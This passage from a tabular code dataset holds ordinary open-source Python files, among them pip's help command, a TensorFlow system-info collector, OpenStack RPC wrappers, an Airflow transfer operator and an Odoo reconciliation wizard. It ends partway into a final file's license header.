repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
jhd/spunout
|
refs/heads/master
|
venv/lib/python2.7/site-packages/pip/commands/help.py
|
401
|
from pip.basecommand import Command, SUCCESS
from pip.exceptions import CommandError
class HelpCommand(Command):
"""Show help for commands"""
name = 'help'
usage = """
%prog <command>"""
summary = 'Show help for commands.'
def run(self, options, args):
from pip.commands import commands, get_similar_commands
try:
# 'pip help' with no args is handled by pip.__init__.parseopt()
cmd_name = args[0] # the command we need help for
except IndexError:
return SUCCESS
if cmd_name not in commands:
guess = get_similar_commands(cmd_name)
msg = ['unknown command "%s"' % cmd_name]
if guess:
msg.append('maybe you meant "%s"' % guess)
raise CommandError(' - '.join(msg))
command = commands[cmd_name]()
command.parser.print_help()
return SUCCESS
|
AOSPA-L/android_external_skia
|
refs/heads/lollipop-mr1
|
gm/rebaseline_server/compare_rendered_pictures.py
|
66
|
#!/usr/bin/python
"""
Copyright 2014 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
Compare results of two render_pictures runs.
"""
# System-level imports
import logging
import os
import re
import time
# Imports from within Skia
import fix_pythonpath # must do this first
from pyutils import url_utils
import gm_json
import imagediffdb
import imagepair
import imagepairset
import results
# URL under which all render_pictures images can be found in Google Storage.
# TODO(epoger): Move this default value into
# https://skia.googlesource.com/buildbot/+/master/site_config/global_variables.json
DEFAULT_IMAGE_BASE_URL = 'http://chromium-skia-gm.commondatastorage.googleapis.com/render_pictures/images'
class RenderedPicturesComparisons(results.BaseComparisons):
"""Loads results from two different render_pictures runs into an ImagePairSet.
"""
def __init__(self, subdirs, actuals_root,
generated_images_root=results.DEFAULT_GENERATED_IMAGES_ROOT,
image_base_url=DEFAULT_IMAGE_BASE_URL,
diff_base_url=None):
"""
Args:
actuals_root: root directory containing all render_pictures-generated
JSON files
subdirs: (string, string) tuple; pair of subdirectories within
actuals_root to compare
generated_images_root: directory within which to create all pixel diffs;
if this directory does not yet exist, it will be created
image_base_url: URL under which all render_pictures result images can
be found; this will be used to read images for comparison within
this code, and included in the ImagePairSet so its consumers know
where to download the images from
diff_base_url: base URL within which the client should look for diff
images; if not specified, defaults to a "file:///" URL representation
of generated_images_root
"""
time_start = int(time.time())
self._image_diff_db = imagediffdb.ImageDiffDB(generated_images_root)
self._image_base_url = image_base_url
self._diff_base_url = (
diff_base_url or
url_utils.create_filepath_url(generated_images_root))
self._load_result_pairs(actuals_root, subdirs)
self._timestamp = int(time.time())
logging.info('Results complete; took %d seconds.' %
(self._timestamp - time_start))
def _load_result_pairs(self, actuals_root, subdirs):
"""Loads all JSON files found within two subdirs in actuals_root,
compares across those two subdirs, and stores the summary in self._results.
Args:
actuals_root: root directory containing all render_pictures-generated
JSON files
subdirs: (string, string) tuple; pair of subdirectories within
actuals_root to compare
"""
logging.info(
'Reading actual-results JSON files from %s subdirs within %s...' % (
subdirs, actuals_root))
subdirA, subdirB = subdirs
subdirA_dicts = self._read_dicts_from_root(
os.path.join(actuals_root, subdirA))
subdirB_dicts = self._read_dicts_from_root(
os.path.join(actuals_root, subdirB))
logging.info('Comparing subdirs %s and %s...' % (subdirA, subdirB))
all_image_pairs = imagepairset.ImagePairSet(
descriptions=subdirs,
diff_base_url=self._diff_base_url)
failing_image_pairs = imagepairset.ImagePairSet(
descriptions=subdirs,
diff_base_url=self._diff_base_url)
all_image_pairs.ensure_extra_column_values_in_summary(
column_id=results.KEY__EXTRACOLUMNS__RESULT_TYPE, values=[
results.KEY__RESULT_TYPE__FAILED,
results.KEY__RESULT_TYPE__NOCOMPARISON,
results.KEY__RESULT_TYPE__SUCCEEDED,
])
failing_image_pairs.ensure_extra_column_values_in_summary(
column_id=results.KEY__EXTRACOLUMNS__RESULT_TYPE, values=[
results.KEY__RESULT_TYPE__FAILED,
results.KEY__RESULT_TYPE__NOCOMPARISON,
])
common_dict_paths = sorted(set(subdirA_dicts.keys() + subdirB_dicts.keys()))
num_common_dict_paths = len(common_dict_paths)
dict_num = 0
for dict_path in common_dict_paths:
dict_num += 1
logging.info('Generating pixel diffs for dict #%d of %d, "%s"...' %
(dict_num, num_common_dict_paths, dict_path))
dictA = subdirA_dicts[dict_path]
dictB = subdirB_dicts[dict_path]
self._validate_dict_version(dictA)
self._validate_dict_version(dictB)
dictA_results = dictA[gm_json.JSONKEY_ACTUALRESULTS]
dictB_results = dictB[gm_json.JSONKEY_ACTUALRESULTS]
skp_names = sorted(set(dictA_results.keys() + dictB_results.keys()))
for skp_name in skp_names:
imagepairs_for_this_skp = []
whole_image_A = RenderedPicturesComparisons.get_multilevel(
dictA_results, skp_name, gm_json.JSONKEY_SOURCE_WHOLEIMAGE)
whole_image_B = RenderedPicturesComparisons.get_multilevel(
dictB_results, skp_name, gm_json.JSONKEY_SOURCE_WHOLEIMAGE)
imagepairs_for_this_skp.append(self._create_image_pair(
test=skp_name, config=gm_json.JSONKEY_SOURCE_WHOLEIMAGE,
image_dict_A=whole_image_A, image_dict_B=whole_image_B))
tiled_images_A = RenderedPicturesComparisons.get_multilevel(
dictA_results, skp_name, gm_json.JSONKEY_SOURCE_TILEDIMAGES)
tiled_images_B = RenderedPicturesComparisons.get_multilevel(
dictB_results, skp_name, gm_json.JSONKEY_SOURCE_TILEDIMAGES)
# TODO(epoger): Report an error if we find tiles for A but not B?
if tiled_images_A and tiled_images_B:
# TODO(epoger): Report an error if we find a different number of tiles
# for A and B?
num_tiles = len(tiled_images_A)
for tile_num in range(num_tiles):
imagepairs_for_this_skp.append(self._create_image_pair(
test=skp_name,
config='%s-%d' % (gm_json.JSONKEY_SOURCE_TILEDIMAGES, tile_num),
image_dict_A=tiled_images_A[tile_num],
image_dict_B=tiled_images_B[tile_num]))
for imagepair in imagepairs_for_this_skp:
if imagepair:
all_image_pairs.add_image_pair(imagepair)
result_type = imagepair.extra_columns_dict\
[results.KEY__EXTRACOLUMNS__RESULT_TYPE]
if result_type != results.KEY__RESULT_TYPE__SUCCEEDED:
failing_image_pairs.add_image_pair(imagepair)
self._results = {
results.KEY__HEADER__RESULTS_ALL: all_image_pairs.as_dict(),
results.KEY__HEADER__RESULTS_FAILURES: failing_image_pairs.as_dict(),
}
def _validate_dict_version(self, result_dict):
"""Raises Exception if the dict is not the type/version we know how to read.
Args:
result_dict: dictionary holding output of render_pictures
"""
expected_header_type = 'ChecksummedImages'
expected_header_revision = 1
header = result_dict[gm_json.JSONKEY_HEADER]
header_type = header[gm_json.JSONKEY_HEADER_TYPE]
if header_type != expected_header_type:
raise Exception('expected header_type "%s", but got "%s"' % (
expected_header_type, header_type))
header_revision = header[gm_json.JSONKEY_HEADER_REVISION]
if header_revision != expected_header_revision:
raise Exception('expected header_revision %d, but got %d' % (
expected_header_revision, header_revision))
def _create_image_pair(self, test, config, image_dict_A, image_dict_B):
"""Creates an ImagePair object for this pair of images.
Args:
test: string; name of the test
config: string; name of the config
image_dict_A: dict with JSONKEY_IMAGE_* keys, or None if no image
image_dict_B: dict with JSONKEY_IMAGE_* keys, or None if no image
Returns:
An ImagePair object, or None if both image_dict_A and image_dict_B are
None.
"""
if (not image_dict_A) and (not image_dict_B):
return None
def _checksum_and_relative_url(dic):
if dic:
return ((dic[gm_json.JSONKEY_IMAGE_CHECKSUMALGORITHM],
dic[gm_json.JSONKEY_IMAGE_CHECKSUMVALUE]),
dic[gm_json.JSONKEY_IMAGE_FILEPATH])
else:
return None, None
imageA_checksum, imageA_relative_url = _checksum_and_relative_url(
image_dict_A)
imageB_checksum, imageB_relative_url = _checksum_and_relative_url(
image_dict_B)
if not imageA_checksum:
result_type = results.KEY__RESULT_TYPE__NOCOMPARISON
elif not imageB_checksum:
result_type = results.KEY__RESULT_TYPE__NOCOMPARISON
elif imageA_checksum == imageB_checksum:
result_type = results.KEY__RESULT_TYPE__SUCCEEDED
else:
result_type = results.KEY__RESULT_TYPE__FAILED
extra_columns_dict = {
results.KEY__EXTRACOLUMNS__CONFIG: config,
results.KEY__EXTRACOLUMNS__RESULT_TYPE: result_type,
results.KEY__EXTRACOLUMNS__TEST: test,
# TODO(epoger): Right now, the client UI crashes if it receives
# results that do not include this column.
# Until we fix that, keep the client happy.
results.KEY__EXTRACOLUMNS__BUILDER: 'TODO',
}
try:
return imagepair.ImagePair(
image_diff_db=self._image_diff_db,
base_url=self._image_base_url,
imageA_relative_url=imageA_relative_url,
imageB_relative_url=imageB_relative_url,
extra_columns=extra_columns_dict)
except (KeyError, TypeError):
logging.exception(
'got exception while creating ImagePair for'
' test="%s", config="%s", urlPair=("%s","%s")' % (
test, config, imageA_relative_url, imageB_relative_url))
return None
# TODO(epoger): Add main() so this can be called by vm_run_skia_try.sh
|
dmoliveira/networkx
|
refs/heads/master
|
examples/pygraphviz/pygraphviz_draw.py
|
27
|
#!/usr/bin/env python
"""
An example showing how to use the interface to the pygraphviz
AGraph class to draw a graph.
Also see the pygraphviz documentation and examples at
http://pygraphviz.github.io/
"""
__author__ = """Aric Hagberg (hagberg@lanl.gov)"""
# Copyright (C) 2006 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
from networkx import *
# plain graph
G=complete_graph(5) # start with K5 in networkx
A=to_agraph(G) # convert to a graphviz graph
A.layout() # neato layout
A.draw("k5.ps") # write postscript in k5.ps with neato layout
|
horance-liu/tensorflow
|
refs/heads/master
|
tensorflow/tools/test/system_info_lib.py
|
101
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Library for getting system information during TensorFlow tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import multiprocessing
import platform
import re
import socket
# pylint: disable=g-bad-import-order
# Note: cpuinfo and psutil are not installed for you in the TensorFlow
# OSS tree. They are installable via pip.
import cpuinfo
import psutil
# pylint: enable=g-bad-import-order
from tensorflow.core.util import test_log_pb2
from tensorflow.python.client import device_lib
from tensorflow.python.framework import errors
from tensorflow.python.platform import gfile
from tensorflow.tools.test import gpu_info_lib
def gather_machine_configuration():
"""Gather Machine Configuration. This is the top level fn of this library."""
config = test_log_pb2.MachineConfiguration()
config.cpu_info.CopyFrom(gather_cpu_info())
config.platform_info.CopyFrom(gather_platform_info())
# gather_available_device_info must come before gather_gpu_devices
# because the latter may access libcudart directly, which confuses
# TensorFlow StreamExecutor.
for d in gather_available_device_info():
config.available_device_info.add().CopyFrom(d)
for gpu in gpu_info_lib.gather_gpu_devices():
config.device_info.add().Pack(gpu)
config.memory_info.CopyFrom(gather_memory_info())
config.hostname = gather_hostname()
return config
def gather_hostname():
return socket.gethostname()
def gather_memory_info():
"""Gather memory info."""
mem_info = test_log_pb2.MemoryInfo()
vmem = psutil.virtual_memory()
mem_info.total = vmem.total
mem_info.available = vmem.available
return mem_info
def gather_cpu_info():
"""Gather CPU Information. Assumes all CPUs are the same."""
cpu_info = test_log_pb2.CPUInfo()
cpu_info.num_cores = multiprocessing.cpu_count()
# Gather num_cores_allowed
try:
with gfile.GFile('/proc/self/status', 'rb') as fh:
nc = re.search(r'(?m)^Cpus_allowed:\s*(.*)$', fh.read())
if nc: # e.g. 'ff' => 8, 'fff' => 12
cpu_info.num_cores_allowed = (
bin(int(nc.group(1).replace(',', ''), 16)).count('1'))
except errors.OpError:
pass
finally:
if cpu_info.num_cores_allowed == 0:
cpu_info.num_cores_allowed = cpu_info.num_cores
# Gather the rest
info = cpuinfo.get_cpu_info()
cpu_info.cpu_info = info['brand']
cpu_info.num_cores = info['count']
cpu_info.mhz_per_cpu = info['hz_advertised_raw'][0] / 1.0e6
l2_cache_size = re.match(r'(\d+)', str(info.get('l2_cache_size', '')))
if l2_cache_size:
# If a value is returned, it's in KB
cpu_info.cache_size['L2'] = int(l2_cache_size.group(0)) * 1024
# Try to get the CPU governor
try:
cpu_governors = set([
gfile.GFile(f, 'r').readline().rstrip()
for f in glob.glob(
'/sys/devices/system/cpu/cpu*/cpufreq/scaling_governor')
])
if cpu_governors:
if len(cpu_governors) > 1:
cpu_info.cpu_governor = 'mixed'
else:
cpu_info.cpu_governor = list(cpu_governors)[0]
except errors.OpError:
pass
return cpu_info
def gather_available_device_info():
"""Gather list of devices available to TensorFlow.
Returns:
A list of test_log_pb2.AvailableDeviceInfo messages.
"""
device_info_list = []
devices = device_lib.list_local_devices()
for d in devices:
device_info = test_log_pb2.AvailableDeviceInfo()
device_info.name = d.name
device_info.type = d.device_type
device_info.memory_limit = d.memory_limit
device_info.physical_description = d.physical_device_desc
device_info_list.append(device_info)
return device_info_list
def gather_platform_info():
"""Gather platform info."""
platform_info = test_log_pb2.PlatformInfo()
(platform_info.bits, platform_info.linkage) = platform.architecture()
platform_info.machine = platform.machine()
platform_info.release = platform.release()
platform_info.system = platform.system()
platform_info.version = platform.version()
return platform_info
|
evernym/plenum
|
refs/heads/master
|
plenum/test/primary_selection/test_add_node_with_f_changed.py
|
2
|
import pytest
from stp_core.common.log import getlogger
from plenum.test.node_catchup.helper import waitNodeDataEquality
from plenum.common.util import randomString
from plenum.test.test_node import checkNodesConnected
from plenum.test.pool_transactions.helper import sdk_add_new_steward_and_node
from plenum.test import waits
logger = getlogger()
@pytest.fixture(scope="function", autouse=True)
def limitTestRunningTime():
return 150
def add_new_node(looper, nodes, sdk_pool_handle, sdk_wallet_steward,
tdir, tconf, all_plugins_path, name=None):
node_name = name or randomString(5)
new_steward_name = "testClientSteward" + randomString(3)
new_steward_wallet_handle, new_node = \
sdk_add_new_steward_and_node(looper,
sdk_pool_handle,
sdk_wallet_steward,
new_steward_name,
node_name,
tdir,
tconf,
all_plugins_path)
nodes.append(new_node)
looper.run(checkNodesConnected(nodes, customTimeout=60))
timeout = waits.expectedPoolCatchupTime(nodeCount=len(nodes))
waitNodeDataEquality(looper, new_node, *nodes[:-1],
customTimeout=timeout, exclude_from_check=['check_last_ordered_3pc_backup'])
return new_node
def test_add_node_with_f_changed(looper, txnPoolNodeSet, tdir, tconf,
allPluginsPath, sdk_pool_handle,
sdk_wallet_steward, limitTestRunningTime):
nodes = txnPoolNodeSet
add_new_node(looper,
nodes,
sdk_pool_handle,
sdk_wallet_steward,
tdir,
tconf,
allPluginsPath,
name="Node5")
add_new_node(looper,
nodes,
sdk_pool_handle,
sdk_wallet_steward,
tdir,
tconf,
allPluginsPath,
name="Node6")
add_new_node(looper,
nodes,
sdk_pool_handle,
sdk_wallet_steward,
tdir,
tconf,
allPluginsPath,
name="Node7")
add_new_node(looper,
nodes,
sdk_pool_handle,
sdk_wallet_steward,
tdir,
tconf,
allPluginsPath,
name="Node8")
# check that all nodes have equal number of replica
assert len(set([n.replicas.num_replicas for n in txnPoolNodeSet])) == 1
assert txnPoolNodeSet[-1].replicas.num_replicas == txnPoolNodeSet[-1].requiredNumberOfInstances
|
xchenum/quantum
|
refs/heads/master
|
quantum/openstack/common/rpc/__init__.py
|
3
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright 2011 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A remote procedure call (rpc) abstraction.
For some wrappers that add message versioning to rpc, see:
rpc.dispatcher
rpc.proxy
"""
from quantum.openstack.common import cfg
from quantum.openstack.common import importutils
rpc_opts = [
cfg.StrOpt('rpc_backend',
default='%s.impl_kombu' % __package__,
help="The messaging module to use, defaults to kombu."),
cfg.IntOpt('rpc_thread_pool_size',
default=64,
help='Size of RPC thread pool'),
cfg.IntOpt('rpc_conn_pool_size',
default=30,
help='Size of RPC connection pool'),
cfg.IntOpt('rpc_response_timeout',
default=60,
help='Seconds to wait for a response from call or multicall'),
cfg.IntOpt('rpc_cast_timeout',
default=30,
help='Seconds to wait before a cast expires (TTL). '
'Only supported by impl_zmq.'),
cfg.ListOpt('allowed_rpc_exception_modules',
default=['quantum.openstack.common.exception',
'nova.exception',
],
help='Modules of exceptions that are permitted to be recreated'
'upon receiving exception data from an rpc call.'),
cfg.StrOpt('control_exchange',
default='nova',
help='AMQP exchange to connect to if using RabbitMQ or Qpid'),
cfg.BoolOpt('fake_rabbit',
default=False,
help='If passed, use a fake RabbitMQ provider'),
]
cfg.CONF.register_opts(rpc_opts)
def create_connection(new=True):
"""Create a connection to the message bus used for rpc.
For some example usage of creating a connection and some consumers on that
connection, see nova.service.
:param new: Whether or not to create a new connection. A new connection
will be created by default. If new is False, the
implementation is free to return an existing connection from a
pool.
:returns: An instance of openstack.common.rpc.common.Connection
"""
return _get_impl().create_connection(cfg.CONF, new=new)
def call(context, topic, msg, timeout=None):
"""Invoke a remote method that returns something.
:param context: Information that identifies the user that has made this
request.
:param topic: The topic to send the rpc message to. This correlates to the
topic argument of
openstack.common.rpc.common.Connection.create_consumer()
and only applies when the consumer was created with
fanout=False.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:param timeout: int, number of seconds to use for a response timeout.
If set, this overrides the rpc_response_timeout option.
:returns: A dict from the remote method.
:raises: openstack.common.rpc.common.Timeout if a complete response
is not received before the timeout is reached.
"""
return _get_impl().call(cfg.CONF, context, topic, msg, timeout)
def cast(context, topic, msg):
"""Invoke a remote method that does not return anything.
:param context: Information that identifies the user that has made this
request.
:param topic: The topic to send the rpc message to. This correlates to the
topic argument of
openstack.common.rpc.common.Connection.create_consumer()
and only applies when the consumer was created with
fanout=False.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:returns: None
"""
return _get_impl().cast(cfg.CONF, context, topic, msg)
def fanout_cast(context, topic, msg):
"""Broadcast a remote method invocation with no return.
This method will get invoked on all consumers that were set up with this
topic name and fanout=True.
:param context: Information that identifies the user that has made this
request.
:param topic: The topic to send the rpc message to. This correlates to the
topic argument of
openstack.common.rpc.common.Connection.create_consumer()
and only applies when the consumer was created with
fanout=True.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:returns: None
"""
return _get_impl().fanout_cast(cfg.CONF, context, topic, msg)
def multicall(context, topic, msg, timeout=None):
"""Invoke a remote method and get back an iterator.
In this case, the remote method will be returning multiple values in
separate messages, so the return values can be processed as the come in via
an iterator.
:param context: Information that identifies the user that has made this
request.
:param topic: The topic to send the rpc message to. This correlates to the
topic argument of
openstack.common.rpc.common.Connection.create_consumer()
and only applies when the consumer was created with
fanout=False.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:param timeout: int, number of seconds to use for a response timeout.
If set, this overrides the rpc_response_timeout option.
:returns: An iterator. The iterator will yield a tuple (N, X) where N is
an index that starts at 0 and increases by one for each value
returned and X is the Nth value that was returned by the remote
method.
:raises: openstack.common.rpc.common.Timeout if a complete response
is not received before the timeout is reached.
"""
return _get_impl().multicall(cfg.CONF, context, topic, msg, timeout)
def notify(context, topic, msg):
"""Send notification event.
:param context: Information that identifies the user that has made this
request.
:param topic: The topic to send the notification to.
:param msg: This is a dict of content of event.
:returns: None
"""
return _get_impl().notify(cfg.CONF, context, topic, msg)
def cleanup():
"""Clean up resoruces in use by implementation.
Clean up any resources that have been allocated by the RPC implementation.
This is typically open connections to a messaging service. This function
would get called before an application using this API exits to allow
connections to get torn down cleanly.
:returns: None
"""
return _get_impl().cleanup()
def cast_to_server(context, server_params, topic, msg):
"""Invoke a remote method that does not return anything.
:param context: Information that identifies the user that has made this
request.
:param server_params: Connection information
:param topic: The topic to send the notification to.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:returns: None
"""
return _get_impl().cast_to_server(cfg.CONF, context, server_params, topic,
msg)
def fanout_cast_to_server(context, server_params, topic, msg):
"""Broadcast to a remote method invocation with no return.
:param context: Information that identifies the user that has made this
request.
:param server_params: Connection information
:param topic: The topic to send the notification to.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:returns: None
"""
return _get_impl().fanout_cast_to_server(cfg.CONF, context, server_params,
topic, msg)
def queue_get_for(context, topic, host):
"""Get a queue name for a given topic + host.
This function only works if this naming convention is followed on the
consumer side, as well. For example, in nova, every instance of the
nova-foo service calls create_consumer() for two topics:
foo
foo.<host>
Messages sent to the 'foo' topic are distributed to exactly one instance of
the nova-foo service. The services are chosen in a round-robin fashion.
Messages sent to the 'foo.<host>' topic are sent to the nova-foo service on
<host>.
"""
return '%s.%s' % (topic, host)
_RPCIMPL = None
def _get_impl():
"""Delay import of rpc_backend until configuration is loaded."""
global _RPCIMPL
if _RPCIMPL is None:
try:
_RPCIMPL = importutils.import_module(cfg.CONF.rpc_backend)
except ImportError:
# For backwards compatibility with older nova config.
impl = cfg.CONF.rpc_backend.replace('nova.rpc',
'nova.openstack.common.rpc')
_RPCIMPL = importutils.import_module(impl)
return _RPCIMPL
|
vitiral/micropython
|
refs/heads/master
|
tests/basics/class_contains.py
|
117
|
# A contains everything
class A:
def __contains__(self, key):
return True
a = A()
print(True in a)
print(1 in a)
print(() in a)
# B contains given things
class B:
def __init__(self, items):
self.items = items
def __contains__(self, key):
return key in self.items
b = B([])
print(1 in b)
b = B([1, 2])
print(1 in b)
print(2 in b)
print(3 in b)
|
teosz/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/fetch/api/resources/method.py
|
161
|
def main(request, response):
headers = []
if "cors" in request.GET:
headers.append(("Access-Control-Allow-Origin", "*"))
headers.append(("Access-Control-Allow-Credentials", "true"))
headers.append(("Access-Control-Allow-Methods", "GET, POST, PUT, FOO"))
headers.append(("Access-Control-Allow-Headers", "x-test, x-foo"))
headers.append(("Access-Control-Expose-Headers", "x-request-method"))
headers.append(("x-request-method", request.method))
return headers, request.body
|
cppisfun/GameEngine
|
refs/heads/master
|
foreign/boost/tools/build/v2/example/python_modules/python_helpers.py
|
12
|
# Copyright 2006 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Declare a couple of functions called from Boost.Build
#
# Each function will receive as many arguments as there ":"-separated
# arguments in bjam call. Each argument is a list of strings.
# As a special exception (aka bug), if no arguments are passed in bjam,
# Python function will be passed a single empty list.
#
# All Python functions must return a list of strings, which may be empty.
def test1(l):
return ["foo", "bar"]
def test2(l, l2):
return [l[0], l2[0]]
|
sekikn/incubator-airflow
|
refs/heads/master
|
airflow/operators/generic_transfer.py
|
5
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import List, Optional, Union
from airflow.hooks.base import BaseHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class GenericTransfer(BaseOperator):
"""
Moves data from a connection to another, assuming that they both
provide the required methods in their respective hooks. The source hook
needs to expose a `get_records` method, and the destination a
`insert_rows` method.
This is meant to be used on small-ish datasets that fit in memory.
:param sql: SQL query to execute against the source database. (templated)
:type sql: str
:param destination_table: target table. (templated)
:type destination_table: str
:param source_conn_id: source connection
:type source_conn_id: str
:param destination_conn_id: source connection
:type destination_conn_id: str
:param preoperator: sql statement or list of statements to be
executed prior to loading the data. (templated)
:type preoperator: str or list[str]
"""
template_fields = ('sql', 'destination_table', 'preoperator')
template_ext = (
'.sql',
'.hql',
)
ui_color = '#b0f07c'
@apply_defaults
def __init__(
self,
*,
sql: str,
destination_table: str,
source_conn_id: str,
destination_conn_id: str,
preoperator: Optional[Union[str, List[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.sql = sql
self.destination_table = destination_table
self.source_conn_id = source_conn_id
self.destination_conn_id = destination_conn_id
self.preoperator = preoperator
def execute(self, context):
source_hook = BaseHook.get_hook(self.source_conn_id)
self.log.info("Extracting data from %s", self.source_conn_id)
self.log.info("Executing: \n %s", self.sql)
results = source_hook.get_records(self.sql)
destination_hook = BaseHook.get_hook(self.destination_conn_id)
if self.preoperator:
self.log.info("Running preoperator")
self.log.info(self.preoperator)
destination_hook.run(self.preoperator)
self.log.info("Inserting rows into %s", self.destination_conn_id)
destination_hook.insert_rows(table=self.destination_table, rows=results)
|
rruebner/odoo
|
refs/heads/master
|
addons/account/wizard/account_reconcile_partner_process.py
|
385
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_partner_reconcile_process(osv.osv_memory):
_name = 'account.partner.reconcile.process'
_description = 'Reconcilation Process partner by partner'
def _get_to_reconcile(self, cr, uid, context=None):
cr.execute("""
SELECT p_id FROM (SELECT l.partner_id as p_id, SUM(l.debit) AS debit, SUM(l.credit) AS credit
FROM account_move_line AS l LEFT JOIN account_account a ON (l.account_id = a.id)
LEFT JOIN res_partner p ON (p.id = l.partner_id)
WHERE a.reconcile = 't'
AND l.reconcile_id IS NULL
AND (%s > to_char(p.last_reconciliation_date, 'YYYY-MM-DD') OR p.last_reconciliation_date IS NULL )
AND l.state <> 'draft'
GROUP BY l.partner_id) AS tmp
WHERE debit > 0
AND credit > 0
""",(time.strftime('%Y-%m-%d'),)
)
return len(map(lambda x: x[0], cr.fetchall())) - 1
def _get_today_reconciled(self, cr, uid, context=None):
cr.execute(
"SELECT l.partner_id " \
"FROM account_move_line AS l LEFT JOIN res_partner p ON (p.id = l.partner_id) " \
"WHERE l.reconcile_id IS NULL " \
"AND %s = to_char(p.last_reconciliation_date, 'YYYY-MM-DD') " \
"AND l.state <> 'draft' " \
"GROUP BY l.partner_id ",(time.strftime('%Y-%m-%d'),)
)
return len(map(lambda x: x[0], cr.fetchall())) + 1
def _get_partner(self, cr, uid, context=None):
move_line_obj = self.pool.get('account.move.line')
partner = move_line_obj.list_partners_to_reconcile(cr, uid, context=context)
if not partner:
return False
return partner[0][0]
def data_get(self, cr, uid, to_reconcile, today_reconciled, context=None):
return {'progress': (100 / (float(to_reconcile + today_reconciled) or 1.0)) * today_reconciled}
def default_get(self, cr, uid, fields, context=None):
res = super(account_partner_reconcile_process, self).default_get(cr, uid, fields, context=context)
if 'to_reconcile' in res and 'today_reconciled' in res:
data = self.data_get(cr, uid, res['to_reconcile'], res['today_reconciled'], context)
res.update(data)
return res
def next_partner(self, cr, uid, ids, context=None):
if context is None:
context = {}
move_line_obj = self.pool.get('account.move.line')
res_partner_obj = self.pool.get('res.partner')
partner_id = move_line_obj.read(cr, uid, context['active_id'], ['partner_id'])['partner_id']
if partner_id:
res_partner_obj.write(cr, uid, partner_id[0], {'last_reconciliation_date': time.strftime('%Y-%m-%d')}, context)
#TODO: we have to find a way to update the context of the current tab (we could open a new tab with the context but it's not really handy)
#TODO: remove that comments when the client side dev is done
return {'type': 'ir.actions.act_window_close'}
_columns = {
'to_reconcile': fields.float('Remaining Partners', readonly=True, help='This is the remaining partners for who you should check if there is something to reconcile or not. This figure already count the current partner as reconciled.'),
'today_reconciled': fields.float('Partners Reconciled Today', readonly=True, help='This figure depicts the total number of partners that have gone throught the reconciliation process today. The current partner is counted as already processed.'),
'progress': fields.float('Progress', readonly=True, help='Shows you the progress made today on the reconciliation process. Given by \nPartners Reconciled Today \ (Remaining Partners + Partners Reconciled Today)'),
'next_partner_id': fields.many2one('res.partner', 'Next Partner to Reconcile', readonly=True, help='This field shows you the next partner that will be automatically chosen by the system to go through the reconciliation process, based on the latest day it have been reconciled.'), # TODO: remove the readonly=True when teh client side will allow to update the context of existing tab, so that the user can change this value if he doesn't want to follow openerp proposal
}
_defaults = {
'to_reconcile': _get_to_reconcile,
'today_reconciled': _get_today_reconciled,
'next_partner_id': _get_partner,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ow2-proactive/agent-linux
|
refs/heads/master
|
palinagent/daemon/tests/testEventGenerator.py
|
1
|
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
#################################################################
#
# ProActive Parallel Suite(TM): The Java(TM) library for
